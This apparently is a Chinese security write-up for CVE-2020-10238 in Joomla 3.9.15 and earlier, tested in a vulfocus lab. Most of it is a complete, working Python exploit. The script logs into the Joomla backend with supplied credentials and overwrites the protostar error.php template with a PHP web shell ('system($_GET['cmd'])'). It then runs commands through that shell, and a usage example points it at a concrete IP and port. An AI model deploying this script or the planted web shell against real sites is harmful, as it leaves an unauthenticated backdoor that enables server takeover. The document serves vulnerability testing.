影响版本

Joomla! <= 3.9.15

实验环境:

vulfocus一键启动docker环境

poc

#!/usr/bin/python
import sys
import requests
import re
import argparse

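def extract_token(resp):
    """Pull Joomla's per-session CSRF token out of a rendered backend page.

    Joomla emits the token as a hidden input whose *name* is a 32-character
    lowercase hex string and whose value is "1"; every state-changing POST
    to the backend must echo it back as the form field ``{token: '1'}``.

    Args:
        resp: A ``requests.Response`` (or any object exposing ``.text``) for
            a backend page.

    Returns:
        The 32-character hex token, or ``None`` when the page carries none
        (the session is not logged in / not allowed to see the page, so
        Joomla served something other than the expected form).
    """
    match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
    if match is None:
        # Single-argument print() is valid under both Python 2 and 3; the
        # original `print(...) + "..."` only worked as a Python 2 statement.
        print("[-] Cannot find CSRF token!\n[-] You are not admin account!")
        return None
    return match.group(1)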
def try_admin_login(sess, url, uname, upass):
    """Authenticate ``sess`` against the Joomla administrator backend.

    Fetches the backend login page to harvest the CSRF token, then POSTs the
    credentials together with that token. Success is judged by the presence
    of the ``task=profile.edit`` link that the backend renders only for a
    logged-in user.

    Args:
        sess: ``requests.Session`` that will hold the backend cookies.
        url: Site base URL (no trailing slash).
        uname: Backend username.
        upass: Backend password.

    Returns:
        True when the backend accepted the login; None when the POST went
        through but the response does not look like a logged-in backend;
        False when no CSRF token could be read from the login page.
        Callers should treat any non-True result as failure.
    """
    admin_url = url + '/administrator/index.php'
    print('[+] Getting token for admin login')
    login_page = sess.get(admin_url, verify=True)
    token = extract_token(login_page)
    if not token:
        return False
    print('[+] Logging in to admin')
    form = {'username': uname, 'passwd': upass, 'task': 'login'}
    # Joomla's CSRF check: the token is the field *name*, its value is "1".
    form[token] = '1'
    reply = sess.post(admin_url, data=form, verify=True)
    logged_in = 'task=profile.edit' in reply.text
    if not logged_in:
        print('[!] Admin Login Failure!')
        return None
    print('[+] Admin Login Successfully!')
    return True

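def rce(sess, url, cmd):
    """Write a PHP web shell into the protostar template and run ``cmd`` through it.

    Uses the already-authenticated backend session to POST a new body for
    ``templates/protostar/error.php`` via com_templates
    (``task=template.apply``), then fetches that file once with
    ``?cmd=<cmd>`` and prints whatever the shell returned.

    Args:
        sess: ``requests.Session`` that has passed ``try_admin_login``.
        url: Site base URL without a trailing slash (e.g. ``http://host:port``).
        cmd: Shell command to execute on the target. It is percent-encoded
            for the query string, so spaces, ``&`` and ``#`` are safe.

    Side effects / caveats:
        * ``templates/protostar/error.php`` is OVERWRITTEN and not backed
          up. The result is a persistent, unauthenticated command-execution
          backdoor reachable by anyone who can browse the site -- restore
          the original file when the test is done.
        * extension_id 506 is the protostar template id in the vulfocus
          image used on this page; another install may use a different id.
        * Exits the process with status 1 when the template editor page
          yields no CSRF token, i.e. the session cannot reach com_templates.
    """
    getjs = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=L2Vycm9yLnBocA%3D%3D'
    resp = sess.get(getjs, verify=True)
    token = extract_token(resp)
    if token is None:
        # The editor page was not rendered for this session (not logged in /
        # no com_templates access); nothing further can succeed.
        sys.exit(1)
    filename = 'error.php'
    # `file=` appears twice in this URL; PHP keeps the last value, i.e. the
    # base64 of "/error.php". Kept verbatim so the request matches the one the
    # target is known to accept.
    shlink = url + '/administrator/index.php?option=com_templates&view=template&id=506&file=506&file=L2Vycm9yLnBocA%3D%3D'
    shdata_up = {
        'jform[source]': "<?php echo 'Hacked by HK\n' ;system($_GET['cmd']); ?>",
        'task': 'template.apply',
        token: '1',
        'jform[extension_id]': '506',
        'jform[filename]': '/' + filename
    }
    sess.post(shlink, data=shdata_up, verify=True)
    # Let requests percent-encode the command instead of splicing it raw into
    # the query string: a raw `cmd` containing spaces, `&` or `#` would be
    # truncated or mangled before it reached system().
    shell_url = url + '/templates/protostar/error.php'
    print('[+] Checking:')
    shreq = sess.get(shell_url, params={'cmd': cmd}, verify=True)
    shresp = shreq.text
    # shreq.url is the exact, already-encoded URL that was requested.
    print(shresp + '[+] Shell link: \n' + shreq.url)
    print('[+] Module finished.')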

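def main():
    """CLI entry point: parse arguments, log in to the Joomla backend, drop the shell.

    Command line:
        -url/--url            base URL of the target; a trailing slash is
                              stripped so the paths appended elsewhere in the
                              script do not become ``//administrator/...``
        -u/--username         backend username (required)
        -p/--password         backend password (required)
        -cmd/--command        command to run through the shell (default: whoami)

    Returns:
        None on completion (``sys.exit(None)`` maps to exit status 0).
        Exits with status 1 when the backend login does not succeed.
    """
    ap = argparse.ArgumentParser()
    ap.add_argument("-url", "--url", required=True,
                    help=" URL for your Joomla target")
    ap.add_argument("-u", "--username", required=True,
                    help="username")
    ap.add_argument("-p", "--password", required=True,
                    help="password")
    ap.add_argument("-cmd", "--command", default="whoami",
                    help="command")
    args = ap.parse_args()

    # argparse already yields strings; the original format(str(...)) wrappers
    # were no-ops. rstrip('/') keeps 'http://host/' from yielding '//administrator'.
    url = args.url.rstrip('/')
    print('[+] Your target: ' + url)
    uname = args.username
    upass = args.password
    command = args.command

    sess = requests.Session()
    # try_admin_login returns False (no CSRF token), None (login rejected) or
    # True. The original only tested `== None`, so the False case fell through
    # and rce() was attempted with an unauthenticated session.
    if not try_admin_login(sess, url, uname, upass):
        sys.exit(1)
    rce(sess, url, command)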
if __name__ == "__main__":
    # main() returns None on success; sys.exit(None) is exit status 0.
    exit_status = main()
    sys.exit(exit_status)

执行命令(需要有效的后台账号;未指定 -cmd 时默认执行 whoami)

python CVE-2020-10238.py -url http://188.40.189.135:62434 -u admin -p admin

返回 webshell 信息。注意:该 PoC 会直接覆盖目标的 templates/protostar/error.php,留下一个无需认证、任何人都能访问的命令执行后门,且脚本不会备份原文件;测试完成后务必恢复或删除该文件:

http://188.40.189.135:62434/templates/protostar/error.php?cmd=whoami

大概就这些……
